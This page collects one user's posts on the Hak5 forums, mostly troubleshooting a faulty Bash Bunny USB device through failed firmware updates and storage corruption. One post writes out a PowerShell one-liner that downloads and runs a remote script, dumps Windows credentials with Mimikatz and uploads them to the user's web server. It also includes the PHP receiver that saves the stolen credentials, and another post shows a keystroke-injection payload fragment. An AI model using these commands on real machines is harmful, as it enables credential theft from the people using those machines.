Hak5 Forums


About TeCHemically

  • Rank
    Hak5 Fan ++

  1. TeCHemically

    Firmware update fails

    Thanks, yes it definitely is in arming mode; and this bunny came on the 1.3 firmware. I checked it before I ran the updater. The unbricking reset process doesn't work either. It never does anything other than boot into arming mode even after the plug in and unplug 3 times over at the beginning of that process.
  2. TeCHemically

    Firmware update fails

    Thanks Just_a_User, I tried that and it is still skipping right over the firmware update as before :( I got excited by your response and was super hopeful that would do it. Thanks anyway :)
  3. TeCHemically

    Firmware update fails

    OK, I am not sure why that formatting issue occurred and why it would not let me just paste the text in w/o making it such a mess. Sorry everyone, thanks to any who read it and reply!
  4. TeCHemically

    Firmware update fails

    I received my replacement bashbunny yesterday and this new one will not perform the firmware update. Here is what I have tried so far: I have the sha checksum verified 1.4 firmware update file on the root of the storage partition and have plugged it into 2 different PCs (one linux and one windows); but it just mounts the storage and boots into arming mode normally. It totally skips the firmware update. I tried the f/w update on a third PC (windows) and it failed to start as well. I even tried the unbricking reset steps provided by Seb. The unbricking reset will not even start. I get no "police" flashing at all. Whenever the bunny is plugged in all it does is mount the storage partition. No reset or firmware update procedures ever begin. I tried to flash the 1.3 firmware as well to make sure it wasn't an issue with the firmware file itself. It just boots normally into arming mode completely bypassing the expected firmware update as it does with the 1.4 version. I also tried running the bunnyupdater version 1.0 and the newer 1.1; no change :(
  5. TeCHemically

    15 Second Mr. Robot Hack question

    Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  6. TeCHemically

    15 Second Mr. Robot Hack question

    I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> It was broken up like this before; but didn't seem to have any effect (I know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  7. TeCHemically

    15 Second Mr. Robot Hack question

    Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  8. Well, I have some ok news and some great news guys. Firstly, thanks to all who assisted me in troubleshooting my issues with my bashbunny. The "ok news" is that I am not crazy, or just plain dumb in the head, and the bashbunny that I have is indeed defective. The "great news" is that Hak5, the kind folks that they are, have been able to verify my suspicions and are getting me a replacement device. Seriously, thanks again to all who helped me troubleshoot this device. I am sincerely grateful for all of your time and suggestions. I am looking forward to my bunny's arrival so I can get to work on the new payloads I have cooking up. I think I have a pretty nice recipe brewing here! :)
  9. Thanks for your reply. Yes, I am safely ejecting; and my AV is set to not interact with the drive letters that my externals mount to.
  10. Just tried to run my first payload after the reformat and it failed on the first operation where the payload creates a directory because it says the file system is corrupted. I even got it to unmount successfully after I put the payload on there before I ran it. If I open a powershell window and try to create the directory I get the same error. This is what fails:

      Q DELAY 6000
      Q GUI r
      Q DELAY 1000
      Q STRING POWERSHELL
      Q ENTER
      Q DELAY 1500
      Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
      Q ENTER
      Q DELAY 1500
      Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
      Q ENTER
      Q DELAY 1500
      Q STRING md \$LOOTDIR2\\
      Q ENTER
      Q DELAY 1000

      This is the command that fails:

      Q STRING md \$LOOTDIR2\\
  11. I updated all related USB drivers and installed all MS USB, RNDIS, and any other "recommended" fixes that sounded like they could even be remotely related just to be sure it wasn't my machine causing this. I only use MBAM for AV and it has rules not to mess with certain drive letters where my tools mount. I ran udisk reformat again today. Then was able to unmount properly. Plugged it back in, and no power. It didn't come on at all. I unplugged then plugged it back in and it booted up. I ran the bunny updater, it found a new firmware version which I thought was odd because I didn't think udisk reformat was supposed to revert it back to an older firmware. I have been on version 1.4. This has happened before as well. I have also gone through the unbricking process after being on 1.4 and afterwards it was NOT on an older firmware; something I thought WAS supposed to happen as a result of that process (correct me if I am mistaken guys). So, after the bunny updater pulls down the firmware it tells me to eject. I try and again it fails just as before: "'BashBunny (O:)' is currently in use. Save any open files on this disc, and then close the files or programs using the files before trying again. If you choose to continue, the files will be closed, which might cause data to be lost." So, whatever corruption issue I keep seeing over the past few weeks is not being resolved by udisk reformat. This thing has me wanting to tear out my hair.
  12. I ran that; and after the reboot as soon as it booted and I tried to unmount the device, I got an error that said files were in use. I'm investigating potential issues with my PC. It's the only other common item in these situations. Making sure all related hotfixes for USB drivers, updated drivers, etc. are installed. Hopefully this resolves the issue and I'll be able to reformat and get this bunny going again. I'll report back. Thanks for the feedback guys! :)
  13. TeCHemically

    Much credentials payloads are not working

    Thanks for your reply. I'm not using mimikatz in this payload though and have no AV on my test VM.
  14. Thanks for all of your feedback. The payloads I am using have ejecting routines built in for this very purpose; but since the storage corruption issues prevent the payloads from executing properly it nullifies the effect the routine is intended to have. I am quite frustrated; and I am sure that is coming across in my conveyance. I don't mean to be passive aggressive at all. That is contrary to my nature. I am just trying to figure out what needs to be done to resolve these seemingly unsolvable issues. My email communications with Hak5 support have not resolved these issues. The bunny has been reformatted, reflashed, etc. several times over the course of the past few weeks and its performance seems to only be getting worse. If it was as simple as that I would be ecstatic right now; but unfortunately, that has not been the case. Every payload, to some degree, is failing with this unit. This is why I believe it's an issue with the device itself. I understand the payloads are community driven and not the responsibility of Hak5; but when nothing works consistently, then the only other place to look is the device itself.
  15. Thanks for your reply. I have gone through several rounds of troubleshooting with this device with Hak5 support. I'm kinda feeling out the community wondering if my issues are being felt elsewhere. I can see many more problem threads in the BB forums than I remember seeing in any of the other Hak5 device forums I have participated in. I am REALLY hoping this is just an issue with my device and that I'll be able to get a replacement and get this working. I am a huge fan of what this device is supposed to be able to do and I would love to start sharing my payloads and begin singing its praises as I had hoped I would be by now. The ducky is a great stable tool for me and I have 3 different pineapples (along with other random hakshop accessories); the bunny is the only device that has been this problematic. I have been a Hak5 since they were on the east coast. So, I'm no stranger to the scene. Please, any who are having no issues with their bunny, do weigh in! I'd love to hear that I am an isolated incident.